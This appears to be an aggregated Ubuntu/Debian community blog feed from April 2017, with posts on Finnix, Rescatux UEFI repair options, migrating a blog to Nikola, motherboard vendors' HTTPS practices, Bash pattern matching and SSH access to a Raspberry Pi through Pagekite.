PowerPC discontinuation: Years ago, I attempted to discontinue Finnix for the PowerPC, but quickly learned there were a number of PowerPC fans who relied on Finnix. I re-introduced the architecture, but with a caveat that it would not be a release blocker (i.e. if a large bug were discovered which affected PowerPC close to release, that particular release would not get PowerPC support). That ended up never happening, but it was still policy.

However, things in the last year have complicated development. Mainly, Debian has announced it is dropping PowerPC from its next release, and has already removed binary-powerpc from its testing line (which Finnix uses as a base). NEALE builds still work against Debian unstable (neale-ppc-unstable-standard, neale-ppc-unstable-minimal), though even unstable’s PowerPC future is uncertain.

Finnix for PowerPC will continue to be buildable via NEALE using unstable as long as this is possible, and again, older Finnix releases will still be usable if you need to work on a PowerPC system.

Once a new Finnix release is made, I plan on rearranging the front page to highlight the latest working release for any particular architecture.

Mirror updates: The Finnix mirror network currently mirrors all Finnix releases, going back to version 0.03 back in 2000, and the total mirror size is about 8GB. I plan on splitting this up into two sets of mirrors, one which contains all historical releases, and one which contains the last 2 releases, plus the last usable release for discontinued architectures as mentioned above. Mirror administrators can then choose if they want to mirror everything, or just the most downloaded releases.

I’ve fixed all of the problems which have been preventing NEALE builds from completing in the last 9 months, and will be starting main development on this new iteration of Finnix, hopefully with a release later in the year.

18 April, 2017 09:47PM

Ubuntu developers

Ubuntu Insights: Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack

Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical, the company behind Ubuntu, the leading operating system for container, cloud, scale-out, and hyperscale computing, announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world.

This partnership, developed in response to growing enterprise demand to consume open source infrastructure (OpenStack and Kubernetes) without the need to build in-house development or operations capabilities, will enable enterprise organizations to focus on strategic digital transformation initiatives rather than day-to-day infrastructure management.

This partnership, along with Unitas Global’s large ecosystem of system integrators and partners, will enable customers to choose an end-to-end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. It can then be delivered as a fully managed solution anywhere in the world, allowing organisations to easily consume the private cloud resources they need without building and operating the cloud themselves.

Private cloud solutions provide predictable performance, security, and the ability to customize the underlying infrastructure. This new joint offering combines Canonical’s powerful automated deployment software and infrastructure operations with Unitas Global’s infrastructure and guest level managed services in data centers globally.

“Canonical and Unitas Global combine automated, customizable OpenStack software alongside fully-managed private cloud infrastructure providing enterprise clients with a simplified approach to cloud integration throughout their business environment,” explains Grant Kirkwood, CTO and Founder, Unitas Global. “We are very excited to partner with Canonical to bring this much-needed solution to market, enabling enhanced growth and success for our clients around the world.”

“By partnering with Unitas Global, we are able to deliver a flexible and affordable solution for enterprise cloud integration utilizing cutting-edge software built on fully-managed infrastructure,” said Arturo Suarez, BootStack Product Manager, Canonical. “At Canonical, it is our mission to drive technological innovation throughout the enterprise marketplace by making flexible, open source software available for simplified consumption wherever needed, and we are looking forward to working side-by-side with Unitas Global to deliver upon this promise.”

To learn more about Unitas Global, visit.

For more information about Canonical BootStack, visit.

18 April, 2017 12:30PM

Alan Pope: Switching from WordPress to Nikola

Goodbye WordPress!

For a long while my personal blog has been running WordPress. Every so often I've looked at other options but never really been motivated to change it, because everything worked, and it was not too much effort to manage.

Then I got 'hacked'. :(

I host my blog on a Bitfolk VPS. I had no idea my server had been compromised until I got a notification on Boxing Day from the lovely Bitfolk people. They informed me that there was a deluge of spam originating from my machine, so it was likely compromised. Their standard procedure is to shutdown the network connection, which they did.

At this point I had access to a console to diagnose and debug what had happened. My VPS had multiple copies of WordPress installed, for various different sites. It looks like I had an old theme or plugin on one of them, which the attackers used to splat their evil doings on my VPS filesystem.

Being the Christmas holidays, I didn't really want to spend the family time doing lots of forensics or system admin. I had full backups of the machine, so I requested that Bitfolk just nuke the machine from orbit and I'd start fresh.

Bitfolk have a really handy self-service provisioning tool for just these eventualities. All I needed to do was ssh to the console provided and follow the instructions on the wiki, after the network connection was re-enabled, of course.

However, during the use of the self-serve installer we uncovered a bug and a billing inconsistency. Andy at Bitfolk spent some time on Boxing Day to fix both the bug and the billing glitch, and by midnight that night I'd had a bank-transfer refund! He also debugged some DNS issues for me too. That's some above-and-beyond level of service right there!

Hello Nikola!

Once I'd got a clean Ubuntu 16.04 install done, I had a not-so-long think about what I wanted to do for hosting my blog going forward. I went for Nikola - a static website generator. I'd been looking at Nikola on and off since talking about it over a beer with Martin in Heidelberg.

Beer in Heidelberg

As I'd considered this before, I was already a little prepared. Nikola supports importing data from an existing WordPress install, and I'd already exported my WordPress posts some weeks ago, so importing that dump into Nikola was easy, even though my server was offline.

The things that sold me on Nikola were pretty straightforward.

Being static HTML files on my server, I didn't have to worry about php files being compromised, so I could take off my sysadmin hat for a bit, as I wouldn't have to do WordPress maintenance all the time.

Nikola allows me to edit offline easily too. So I can just open my text editor of choice and start bashing away in markdown (other formats are supported). Here you can see what it looks like when I'm writing a blog post in today's favourite editor, Atom. With the markdown preview on the right, I can easily see what my post is going to look like as I type. I imagine I could do this with WordPress too, sure.

Writing this post

Once posts are written I can easily preview the entire site locally before I publish. So I get two opportunities to spot errors, once in Atom while editing and previewing, and again when serving the content locally. It works well for me!

Nikola Workflow

Nikola is configured easily by editing conf.py. In there you'll find documentation in the form of many comments to supplement the online Nikola Handbook. I set a few things like the theme, my disqus comments account name, and the configuration of the Bitfolk VPS remote server where I'm going to host it. With ssh keys all set up, I configured Nikola to deploy using rsync over ssh.
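
For illustration, here is roughly what the relevant corner of a conf.py can look like (the theme, Disqus shortname, host and path below are placeholders, not my actual settings):

```python
# Hypothetical excerpt from Nikola's conf.py -- all values are placeholders.
BLOG_TITLE = "Example Blog"
THEME = "bootstrap3"                  # whichever theme you picked
COMMENT_SYSTEM = "disqus"
COMMENT_SYSTEM_ID = "example-shortname"

# "nikola deploy" simply runs these shell commands in order; with ssh
# keys in place, rsync pushes the generated output/ tree to the server.
DEPLOY_COMMANDS = {
    'default': [
        "rsync -rav --delete output/ user@example.com:/var/www/blog/",
    ],
}
```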

When I want to write a new blog post, here's what I do.

cd popey.com/site
nikola new_post -t "Switching from WordPress to Nikola" -f markdown

I then edit the post at my leisure locally in Atom, and enable preview there with CTRL+SHIFT+M.

Once I'm happy with the post I'll build the site:-

nikola build

I can then start nikola serving the pages up on my laptop with:-

nikola serve

This starts a webserver on port 8000 on my local machine, so I can check the content in various browsers, and on mobile devices should I want to.

Obviously I can loop through those few steps over and again, to get my post right. Finally once I'm ready to publish I just issue:-

nikola deploy

This sends the content to the remote host over rsync/ssh and it's live!


Nikola is great! The documentation is comprehensive, and the maintainers are active. I made a mistake in my config and immediately got a comment from the upstream author to let me know what to do to fix it!

I'm only using the bare bones features of Nikola, but it works perfectly for me. Easy to post & maintain and simple to deploy and debug.

Have you migrated away from WordPress? What did you use? Let me know in the comments below.

18 April, 2017 12:00PM



Rescatux 0.41 beta 1 released

Rescatux 0.41 beta 1 has been released.

Rescatux 0.41 beta 1 new options
Update UEFI order in action


Rescatux 0.41b1 size is about 672 Megabytes.

Some thoughts:

I couldn’t have released a stable Rescatux without UEFI options, so I had to add them. So here they are. Please test them and give us feedback, either on the mailing list or in the bug tracker. Depending on how well these new options replace the Boot Repair functionality, I will remove Boot Repair from Rescatux. Many people, somehow, are using Boot Repair inside Rescatux while we don’t support it, and that should be fixed in the next Rescatux stable release.

This new beta release comes with new exciting UEFI options:

  • Update UEFI order
  • Create a new UEFI Boot entry
  • UEFI Partition Status
  • Fake Microsoft Windows UEFI
  • Hide Microsoft Windows UEFI
  • Reinstall Microsoft Windows EFI
  • Check UEFI Boot

You can take a look at the new UEFI options in the Rescatux – New UEFI options explained video. (The video is a live session, not scripted in advance, which means it might be longer than needed and maybe boring. You have been warned 😉 . )

The Youtube description has the specific links for each one of the options.

I will explain these in detail here. This will probably go into the features page in the future.

* New option: Update UEFI order
** Shows all available UEFI boot entries and lets you reorder them

* New option: Create a new UEFI Boot entry.
** Select an EFI file among those present in the ESP partition and add it to the UEFI boot entries
** Make it the default boot entry

* New option: UEFI Partition Status, to know if an ESP partition is a proper ESP partition or not
** Checks if fdisk detects it as an ESP partition
** Checks the esp flag on the partition
** Checks the boot flag on the partition
** Checks if there's a valid filesystem (fat12, fat16 or fat32) on the partition
** Checks if the partition can be mounted
** Checks if the partition's disk label type is either gpt or msdos

* New option: Fake Microsoft Windows UEFI boot entry
** Select an EFI file and overwrite the Microsoft EFI files with it
** Rename it to 'Windows Boot Manager' too.

* New option: Hide Microsoft Windows UEFI boot entry and define a default fallback one.
** Select an EFI file and overwrite the default EFI one
** Make sure to delete the default Microsoft Windows ones
** This should be useful for faulty UEFIs such as the one in HP EliteBook 8460p laptops

* New option: Reinstall Microsoft Windows EFI
** It copies UEFI files from the Windows installation into the EFI System Partition (ESP)
** It adds a new 'Windows Boot Manager' entry and makes it the default one.
** Unfortunately this option is unable to regenerate the BCD, so it's only useful when you have merely overwritten or lost the UEFI files

There have also been many usability improvements to make the life of the final user easier:

* Now EFI System partitions are shown properly in the Rescapp menus
* Now partition types are shown in partition dialogs in the Rescapp menus
* Now partition flags are shown in partition dialogs in the Rescapp menus
* Now partition os-prober long names are shown in partition dialogs in the Rescapp menus
* Show 'Unknown GNU/Linux distro' if we ever fail to parse an /etc/issue file.
* order.py: Usability improvement. When moving entries, the last entry moved stays selected.

* Rescatux width has been increased to 800 pixels.
* Added AFD scanning technology adapted for Spanish systems.
* Many grubeasy option improvements (Now handles UEFI too)

Important notice:

  • If you want to use the UEFI options make sure you use DD or another equivalent tool (Rufus in ‘Direct image’ mode, usb imagewriter, etc.) to put Rescatux in your USB
  • If you want to use UEFI options make sure you boot your Rescatux device in UEFI mode
  • If you want to use Rescatux make sure you temporarily disable Secure Boot. Rescatux does not support booting in Secure Boot mode, but it should be able to fix most UEFI Secure Boot problems if booted in non-Secure-Boot mode.

More things I want to do before the stable release are:

Let’s hope it happens sooner than later.

Roadmap for Rescatux 0.40 stable release:

You can check the complete changelog with link to each one of the issues at: Rescatux 0.32-freeze roadmap which I’ll be reusing for Rescatux 0.40 stable release.

  • (Fixed in 0.40b5) [#2192] UEFI boot support
  • (Fixed in 0.40b2) [#1323] GPT support
  • (Fixed in 0.40b11) [#1364] Review Copyright notice
  • (Fixed in: 0.32b2) [#2188] install-mbr : Windows 7 seems not to be fixed with it
  • (Fixed in: 0.32b2) [#2190] debian-live. Include cpu detection and loopback cfg patches
  • (Fixed in: 0.40b8) [#2191] Change Keyboard layout
  • (Fixed in: 0.32b2) [#2193] bootinfoscript: Use it as a package
  • (Fixed in: 0.32b2) [#2199] Btrfs support
  • (Closed in 0.40b1) [#2205] Handle different default sh script
  • (Fixed in 0.40b2) [#2216] Verify separated /usr support
  • (Fixed in: 0.32b2) [#2217] chown root root on sudoers
  • [#2220] Make sure all the source code is available
  • (Fixed in: 0.32b2) [#2221] Detect SAM file algorithm fails with directories which have spaces on them
  • (Fixed in: 0.32b2) [#2227] Use chntpw 1.0-1 from Jessie
  • (Fixed in 0.40b1) [#2231] SElinux support on chroot options
  • (Checked in 0.40b11) [#2233] Disable USB automount
  • (Fixed in 0.40b9) [#2236] chntpw based options need to be rewritten for reusing code
  • [#2239] Update doc: the “Put Rescatux into a media” page (http://www.supergrubdisk.org/wizard-step-put-rescatux-into-a-media/) assumes that the image is based on Super Grub2 Disk and not Isolinux. The step about extracting an ISO inside an ISO would no longer be needed for an Isolinux-based CD.
  • (Fixed in: 0.32b2) [#2259] Update bootinfoscript to the latest GIT version
  • (Fixed in: 0.40b9) [#2264] chntpw – Save prior registry files
  • (Fixed in: 0.40b9) [#2234] New option: Easy Grub fix
  • (Fixed in: 0.40b9) [#2235] New option: Easy Windows Admin

New options (0.41b1):

  • (Added in 0.41b1) Update UEFI order
  • (Added in 0.41b1) Create a new UEFI Boot entry
  • (Added in 0.41b1) UEFI Partition Status
  • (Added in 0.41b1) Fake Microsoft Windows UEFI
  • (Added in 0.41b1) Hide Microsoft Windows UEFI
  • (Added in 0.41b1) Reinstall Microsoft Windows EFI
  • (Added in 0.41b1) Check UEFI Boot

Improved bugs (0.41b1):

  • (Improved in 0.41b1) Now EFI System partitions are shown properly in the Rescapp menus
  • (Improved in 0.41b1) Now partition types are shown in partition dialogs in the Rescapp menus
  • (Improved in 0.41b1) Now partition flags are shown in partition dialogs in the Rescapp menus
  • (Improved in 0.41b1) Now partition os-prober long names are shown in partition dialogs in the Rescapp menus
  • (Improved in 0.41b1) Show ‘Unknown GNU/Linux distro’ if we ever fail to parse an /etc/issue file.
  • (Improved in 0.41b1) Usability improvement. When moving entries, the last entry moved stays selected.

Improved bugs (0.40b11):

  • (Improved in 0.40b11) Many source code build improvements
  • (Improved in 0.40b11) Now most options show their progress while running
  • (Improved in 0.40b11) Added a reference to the source code’s README file in the ‘About Rescapp’ option
  • (Improved in 0.40b11) ‘Not detected’ string was renamed to ‘Windows / Data / Other’ because that’s what usually happens with Windows OSes

Fixed bugs (0.40b11):

  • (Fixed in 0.40b11) [#1364] Review Copyright notice
  • (Checked in 0.40b11) [#2233] Disable USB automount
  • (Fixed in 0.40b11) Wineasy had its messages fixed (Promote and Unlock were swapped)
  • (Fixed in 0.40b11) Share log function now drops usage of cat to avoid utf8 / ascii problems.
  • (Fixed in 0.40b11) Sanitize ‘Not detected’ and ‘Cannot mount’ messages

Fixed bugs (0.40b9):

  • (Fixed in 0.40b9) [#2236] chntpw based options need to be rewritten for reusing code
  • (Fixed in: 0.40b9) [#2264] chntpw – Save prior registry files
  • (Fixed in: 0.40b9) [#2234] New option: Easy Grub fix
  • (Fixed in: 0.40b9) [#2235] New option: Easy Windows Admin

Fixed bugs (0.40b8):

  • (Fixed in 0.40b8) [#2191] Change Keyboard layout

Improved bugs (0.40b7):

  • (Improved in 0.40b7) [#2192] UEFI boot support (Yes, again)

Improved bugs (0.40b6):

  • (Improved in 0.40b6) [#2192] UEFI boot support

Fixed bugs (0.40b5):

  • (Fixed in 0.40b5) [#2192] UEFI boot support

Fixed bugs (0.40b2):

  • (Fixed in 0.40b2) [#1323] GPT support
  • (Fixed in 0.40b2) [#2216] Verify separated /usr support

Fixed bugs (0.40b1):

  • (Fixed in 0.40b1) [#2231] SElinux support on chroot options

Reopened bugs (0.40b1):

  • (Reopened in 0.40b1) [#2191] Change Keyboard layout

Fixed bugs (0.32b3):

  • (Fixed in 0.32b3) [#2191] Change Keyboard layout

Other fixed bugs (0.32b2):

  • Rescatux logo is not shown at boot
  • Boot entries are named “Live xxxx” instead of “Rescatux xxxx”

Fixed bugs (0.32b1):

  • Networking detection improved (fallback to network-manager-gnome)
  • Bottom bar does not have a shortcut to a file manager, as is common practice in modern desktops. Fixed when falling back to LXDE.
  • Double-clicking on directories on desktop opens Iceweasel (Firefox fork) instead of a file manager. Fixed when falling back to LXDE.

Improvements (0.32b1):

  • Super Grub2 Disk is no longer included. That makes it easier to put the ISO on USB devices thanks to standard multiboot tools which support Debian Live CDs.
  • Rescapp UI has been redesigned
    • Every option is at hand at the first screen.
    • Rescapp options can be scrolled. That makes it easier to add new options without worrying about the final design.
    • Run option screen buttons have been rearranged to make it easier to read.
  • RazorQT has been replaced by LXDE which seems more mature. LXQT will have to wait.
  • WICD has been replaced by network-manager-gnome. That makes it easier to connect to wired and wireless networks.
  • It is no longer based on Debian Unstable (sid) branch.

Distro facts:

  • Packages versions for this release can be found at Rescatux 0.40b11 packages.
  • It’s based mainly on Debian Jessie (stable). Some packages are from Debian unstable (sid), and some packages are from Debian stretch.


Don’t forget that you can use:

Help Rescatux project:

I think we can expect four months maximum until the new stable Rescatux is ready. Help on these tasks is appreciated:

  • Making a youtube video for the new options.
  • Make sure documentation for the new options is right.
  • Make snapshots for new options documentation so that they don’t lack images.

If you want to help please contact us here:

Thank you and happy download!


18 April, 2017 07:22AM by adrian15

Ubuntu developers

Bryan Quigley: Who we trust | Building a computer

I thought I was being smart.  By not buying through AVADirect I wasn’t going to be using an insecure site to purchase my new computer.

For the curious, I ended up purchasing through eBay (A rating) and Newegg (A rating) a new Ryzen (very nice chip!) based machine that I assembled myself. The computer is working mostly OK, but has some stability issues. A BIOS update comes out on the MSI website promising some stability fixes, so I decide to apply it.

The page that links to the download is HTTPS, but the actual download itself is not.
I flash the BIOS and now appear to have a brick.

As part of troubleshooting I find that the MSI website has bad HTTPS security, the worst page being:

Given the poor security, and now wanting a motherboard with a more reliable BIOS (currently I need to send the board back at my expense for an RMA), I looked at other Micro ATX motherboards, starting with a Gigabyte, which has even fewer pages using any HTTPS, and the ones that do are even worse:

Unfortunately a survey of motherboard vendors indicates that MSI, failing with Fs, might still be in second place. Most just have everything in the clear, including passwords. ASUS clearly leads the pack, but no one protects the actual firmware/drivers you download from them.

Vendor   | Main Website                 | Support Site | RMA Process | Forum                  | Download Site | Actual Download
---------|------------------------------|--------------|-------------|------------------------|---------------|----------------
MSI      | F                            | F            | F           | F                      | F             | Plain text
AsRock   | Plain text                   | Email        | Email       | Plain text             | Plain text    | Plain text
Gigabyte | Plain text (login site is F) | Plain text   | Plain text  | Plain text             | Plain text    | Plain text
EVGA     | Plain text default / A-      | Plain text   | Plain text  | A                      | Plain text    | Plain text
ASUS     | A-                           | A-           | B           | Plain text default / A | A-            | Plain text
BIOSTAR  | Plain text                   | Plain text   | Plain text  | n/a?                   | Plain text    | Plain text

A quick glance indicates that vendors that make full systems use more security (ASUS and MSI being examples of system builders).

We rely on the security of these vendors for most self-built PCs. We should demand HTTPS by default across the board. It’s 2017 and a BIOS file is 8MB; cost hasn’t been a factor for years.
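
A toy version of that survey, just checking which download links use HTTPS, is only a few lines (the URLs below are made-up placeholders, not real vendor links):

```python
from urllib.parse import urlparse

def insecure_downloads(urls):
    """Return the links that are not served over HTTPS."""
    return [u for u in urls if urlparse(u).scheme != "https"]

links = [
    "https://example-vendor.com/support/board-bios",       # page: OK
    "http://download.example-vendor.com/bios/update.zip",  # file: plain text
]
print(insecure_downloads(links))
# → ['http://download.example-vendor.com/bios/update.zip']
```

Of course, a real check would also need to follow redirects and verify certificate quality; this only inspects the URL scheme.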

18 April, 2017 12:50AM

April 17, 2017

Ross Gammon: My March 2017 Activities

March was a busy month, so this monthly report is a little late. I worked two weekends, and I was planning my Easter holiday, so there wasn’t a lot of spare time.


  •  Updated Dominate to the latest version and uploaded to experimental (due to the Debian Stretch release freeze).
  • Uploaded the latest version of abcmidi (also to experimental).
  • Pinged the bugs for reverse dependencies of pygoocanvas and goocanvas with a view to getting them removed from the archive during the Buster cycle.
  • Asked for help on the Ubuntu Studio developers and users mailing lists to test the coming Ubuntu Studio 17.04 release ISO, because I would be away on holiday for most of it.


  • Worked on ubuntustudio-controls, reverting it back to an earlier revision that Len said was working fine. Unfortunately, when I built and installed it from my ppa, it crashed. Eventually found my mistake with the bzr reversion, fixed it and prepared an upload ready for sponsorship. Submitted a Freeze Exception bug in the hope that the Release Team would accept it even though we had missed the Final Beta.
  • Put a new power supply in an old computer that was kaput, and got it working again. Set up Ubuntu Server 16.04 on it so that I could get a bit more experience with running a server. It won’t last very long, because it is a 32 bit machine, and Ubuntu will probably drop support for that architecture eventually. I used two small spare drives to set up RAID 1 & LVM (so that I can add more space to it later). I set up some Samba shares, so that my wife will be able to get at them from her Windows machine. For music streaming, I set up Emby Server. It would be great to see this packaged for Debian. I uploaded all of my photos and music for Emby to serve around the home (and remotely as well). Set up Obnam to back up the server to an external USB stick (temporarily until I set up something remote). Set up LetsEncrypt with the wonderful Certbot program.
  • Did the Release Notes for Ubuntu Studio 17.04 Final Beta. As I was in Brussels for two days, I was not able to do any ISO testing myself.


  • Measured up the new model railway layout and documented it in xtrkcad.
  • Started learning Ansible some more by setting up ssh on all my machines so that I could access them with Ansible and manipulate them using a playbook.
  • Went to the Open Source Days conference just down the road in Copenhagen. Saw some good presentations. Of interest for my previous work in the Debian GIS Team was a presentation from the Danish municipalities on how they run projects using Open Source. I noted their use of Proj.4 and OSGeo. I was also pleased to see a presentation from Ximin Luo on Reproducible Builds, and introduced myself briefly after his talk (during the break).
  • Started looking at creating a Django website to store and publish my One Name Study sources (indexes). Started by creating a library to list some of my recently read journals. I will eventually need to import all the others I have listed in a csv spreadsheet that was originally exported from the commercial (Windows-only) Custodian software.

Plan status from last month & update for next month


For the Debian Stretch release:

  • Keep an eye on the Release Critical bugs list, and see if I can help fix any. – In Progress


  • Package all the latest upstream versions of my Debian packages, and upload them to Experimental to keep them out of the way of the Stretch release. – In Progress
  • Begin working again on all the new stuff I want packaged in Debian.


  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Started
  • Start testing & bug triaging Ubuntu Studio packages. – In progress
  • Test Len’s work on ubuntustudio-controls – Done
  • Do the Ubuntu Studio Zesty 17.04 Final Beta release. – Done
  • Sort out the Blueprints for the coming Ubuntu Studio 17.10 release cycle.


  • Give JMRI a good try out and look at what it would take to package it. – In progress
  • Also look at OpenPLC for simulating the relay logic of real railway interlockings (i.e. a little bit of the day job at home involving free software – fun!). – In progress

17 April, 2017 02:35PM

Ubuntu Insights: Industrial IoT – Manage and Control Remote Assets

This is a guest post by Florian Hoenigschmid, Director of azeti. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

When you make a phone call, watch TV or wash your hands, you probably won’t initially associate it with terms like predictive maintenance, equipment damage, downtime or Service Level Agreements.

However, those things are helping to provide services such as mobile connectivity, a stable power grid or clean water. IoT gateways running asset management applications, connected to sensors and machinery, are part of a remote asset management system which monitors and controls critical infrastructure like generators, compressors or HVAC systems in remote locations such as cell towers, water pumping stations or secondary substations. These systems provide operators with insights about the performance of their assets in remote locations. This helps to determine if an asset is about to stop working and therefore requires maintenance (preventive maintenance), if equipment has been stolen or destroyed, or if operations could be improved and organized in a more cost-effective way. The installed remote asset management systems help to minimize downtime, which in turn means a higher quality of the service provided.

Full Stack – Ubuntu and azeti
azeti’s solution is the full stack for managing industrial environments consisting of intelligent software for the edge (azeti Site Controller) running on IoT gateways plus a central server (azeti Engine) application providing visualization, management and deployment capabilities.

Ubuntu Core is the solid foundation for the IoT application and eliminates worries about OS upgrades, security updates and general OS management for thousands of devices. Its broad gateway support helps to choose the right hardware for a customer’s requirements without a hardware vendor lock-in.

Edge Intelligence for Harsh Environments
azeti’s Site Controller is comparable to a virtual PLC (programmable logic controller) and provides interfaces for all prominent sensor protocols plus sophisticated analytics and automation. This local intelligence enables independence from the network uplink, as even without a cloud connection all local rulesets and automations will function.

A couple of years ago the paradigm was to centralize, process and analyze everything in the cloud; azeti and Canonical are demonstrating that this paradigm is now shifting towards the edge of the network. As all the data is processed right where it is generated by sensors and machinery, the need for bandwidth, and therefore cost, is reduced; local execution of actions lowers latency; and a network with distributed computing is also less vulnerable than a centralized approach, which may create a single point of failure.

Reference Use Cases
Remote Maintenance Service for Electric Drives – a great example of how IoT can generate new revenue and optimize operations is the project with one of the largest electrical drive vendors, where azeti provides the software stack to collect metrics from the drives and visualize them in beautiful dashboards. Customers can now check the health and performance of their drives in a modern web application without connecting directly to the machinery. Remote maintenance is now offered as a new service by the vendor; the increased visibility into assets allows sophisticated preparation before engineers are sent on site, downtimes are decreased and maintenance efforts are reduced. Customers receive better service and increased uptime of their environments.

Battery and Generator Management in the Jungle – another real-life deployment is with a service provider customer that operates several hundred telecommunication sites in demanding locations, such as close to the coast or in deep jungle. The major requirement was to allow remote health checks of their on-site batteries as well as remote maintenance work on the diesel generators. The network uplink is unreliable, and visits to the sites have to be reduced as much as possible. azeti’s automation engine gathers performance and health data from installed sensors and directly from the machinery. The operations team can now remotely discharge and charge the batteries, start and stop the generators, and gain insights into the whole facility. On top of this, video cameras provide live feeds, and access control eliminates the need for physical keys. On-site visits and maintenance efforts have been reduced tremendously, as periodic charging and discharging cycles considerably extend the batteries’ lifetime, and the diesel generators are started and stopped regularly to ensure stable operation during outages. One of these outages happened recently during a hurricane, where the solution proved its robustness.

Further use cases in logistics, manufacturing, utilities and medical logistics show the variety of IoT solutions – Ubuntu Core for IoT is the layer enabling all of these use cases and applications, providing hardware independence, security and easy manageability.

Learn more about azeti here.

17 April, 2017 09:00AM

David Tomaschik: Bash Extended Test & Pattern Matching

While my daily driver shell is ZSH, when I script, I tend to target Bash. I’ve found it’s the best mix of availability & feature set. (Ideally, scripts would be in pure POSIX shell, but then I’m missing a lot of features that would make my life easier. On the other hand, ZSH is not available everywhere, and certainly many systems do not have it installed by default.)

I’ve started trying to use the Bash “extended test command” ([[) when I write tests in bash, because it has fewer ways you can misuse it with bad quoting (the shell parses the whole test command rather than parsing it as arguments to a command) and I find the operations available easier to read. One of those operations is pattern matching of strings, which allows for stupidly simple substring tests and other conveniences. Take, for example:

animals="bird cat dog"
if [[ $animals == *dog* ]] ; then
  echo "We have a dog!"
fi
This is an easy way to see if an item is contained in a string.

Anyone who’s done programming or scripting is probably aware that the equality operator (i.e., test for equality) is a commutative operator. That is to say the following are equivalent:

if [[ $a == $b ]] ; then
  echo "a and b are equal."
fi
if [[ $b == $a ]] ; then
  echo "a and b are still equal."
fi

Seems obvious right? If a equals b, then b must equal a. So surely we can reverse our test in the first example and get the same results.

animals="bird cat dog"
if [[ *dog* == $animals ]] ; then
  echo "We have a dog!"
else
  echo "No dog found."
fi

Go ahead, give it a try, I’ll wait here.

OK, you probably didn’t even need to try it, or this would have been a particularly boring blog post. (Which isn’t to say that this one is a page turner to begin with.) Yes, it turns out that sample prints No dog found., but obviously we have a dog in our animals. If equality is commutative and the pattern matching worked in the first place, then why doesn’t this test work?

Well, it turns out that the equality test operator in bash isn’t really commutative – or more to the point, that the pattern expansion isn’t commutative. Reading the Bash Reference Manual, we discover that there’s a catch to pattern expansion:

When the ‘==’ and ‘!=’ operators are used, the string to the right of the operator is considered a pattern and matched according to the rules described below in Pattern Matching, as if the extglob shell option were enabled. The ‘=’ operator is identical to ‘==’. If the nocasematch shell option (see the description of shopt in The Shopt Builtin) is enabled, the match is performed without regard to the case of alphabetic characters. The return value is 0 if the string matches (‘==’) or does not match (‘!=’) the pattern, and 1 otherwise. Any part of the pattern may be quoted to force the quoted portion to be matched as a string.

(Emphasis mine.)

It makes sense when you think about it (I can’t begin to think how you would compare two patterns) and it is at least documented, but it wasn’t obvious to me. Until it bit me in a script – then it became painfully obvious.
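The last sentence of that quote also gives you the escape hatch: quoting any part of the right-hand side forces it to be compared literally. A minimal sketch (the variable name is just for illustration):

```shell
#!/usr/bin/env bash
animals="bird cat dog"

# Right side unquoted: *dog* is treated as a pattern, so this matches.
if [[ $animals == *dog* ]]; then
  echo "pattern match"
fi

# Right side quoted: "*dog*" is compared as a literal string, so it
# does not match and the else branch runs.
if [[ $animals == "*dog*" ]]; then
  echo "literal match"
else
  echo "no literal match"
fi
```

This prints pattern match followed by no literal match, which is handy when the string you are comparing against might itself contain glob characters.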

Like many of these posts, writing this is intended primarily as a future reference to myself, but also in hopes it will be useful to someone else. It took me half an hour of Googling to get the right keywords to discover this documentation (I didn’t know the double bracket syntax was called the “extended test command”, which helps a lot), so hopefully it took you less time to find this post.

17 April, 2017 07:00AM

Ted Gould: SSH to RaspPi from anywhere

Probably like most of you I have a Raspberry Pi 2 sitting around not doing a lot. A project that I wanted to use mine for is setting up reliable network access to my home network when I'm away. I'm a geek, so network access for me means SSH. The problem with a lot of solutions out there is that ISPs on home networks change IPs, routers have funky port configurations, and a host of other annoyances that make setting up access unreliable. That's where Pagekite comes in.

Pagekite is a service that is based in Iceland and allows tunneling various protocols, including SSH. It gives a DNS name at one end of that tunnel and allows connecting from anywhere. They run on Open Source software and their libraries are all Open Source. They charge a small fee, which I think is reasonable, but they also provide a free trial account that I used to set this up and test it. You'll need to sign up for Pagekite to get the name and secret to fill in below.

The first thing I did was set up Ubuntu Core on my Pi and get it booting and configured. The built-in configuration tool grabs my SSH keys, so I don't need to do any additional configuration of SSH. (You should always use key-based login when you can.) Then I SSH'd in on the local network to install and set up a small Pagekite snap I made, like this:

# Install the snap
sudo snap install pagekite-ssh
# Configure the snap
snap set pagekite-ssh kitename=<your name>.pagekite.me kitesecret=<a bunch of hex>
# Restart the service to pickup the new config
sudo systemctl restart snap.pagekite-ssh.pagekite-ssh.service 
# Look at the logs to make sure there are no errors
journalctl --unit snap.pagekite-ssh.pagekite-ssh.service 

I then configured SSH to connect through Pagekite by editing my .ssh/config:

Host *.pagekite.me
    User <U1 name> 
    IdentityFile ~/.ssh/id_launchpad
    CheckHostIP no
    ProxyCommand /bin/nc -X connect -x %h:443 %h %p
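With that stanza in place, reaching the Pi from anywhere is just an ordinary SSH invocation against the kite name registered above (substitute your own kite name):

```
ssh <your name>.pagekite.me
```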

Now I can SSH into my Raspberry Pi from anywhere on the Internet! You could also install this on other boards that Ubuntu Core supports, or anywhere snapd runs.

What is novel to me is that I now have a small low-power board that I can plug into any network, where it will grab an IP address and set up a tunnel to a known address so I can access it. It will also update itself without me interacting with it at all. I'm considering putting one at my Dad's house as well to enable helping him with his network issues when the need arises. Make sure to only put these on networks that you have permission for, though!

17 April, 2017 05:00AM

Stephen Michael Kellat: Coming Up To Periscope Depth

I can say that work has not been pretty as of late. Some people have contacted me via Telegram. The secure call function works nicely provided I wear headphones with a built-in microphone so I can see the screen to read off the emojis to the other participant. When we get to April 28th I should have a clearer picture as to how bad things are going to get at work as a federal civil servant. My ability to travel to OggCamp 17 will probably be a bit more known by then.

I have not been to Europe since 1998 so it would be nice to leave the Americas again for at least a little while after having paid visits to the British Virgin Islands, American Samoa, and Canada in the intervening time. If I could somehow figure out how to engage in a "heritage quest" to Heacham in Norfolk, that would be nice too. I know we've seen Daniel Pocock touch on the mutability of citizenship on Planet Ubuntu before but, as I tell the diversity bureaucrats at work from time to time, some of my forebears met the English coming off the boat at Jamestown. If I did the hard work I could probably join the Sons of the American Revolution.

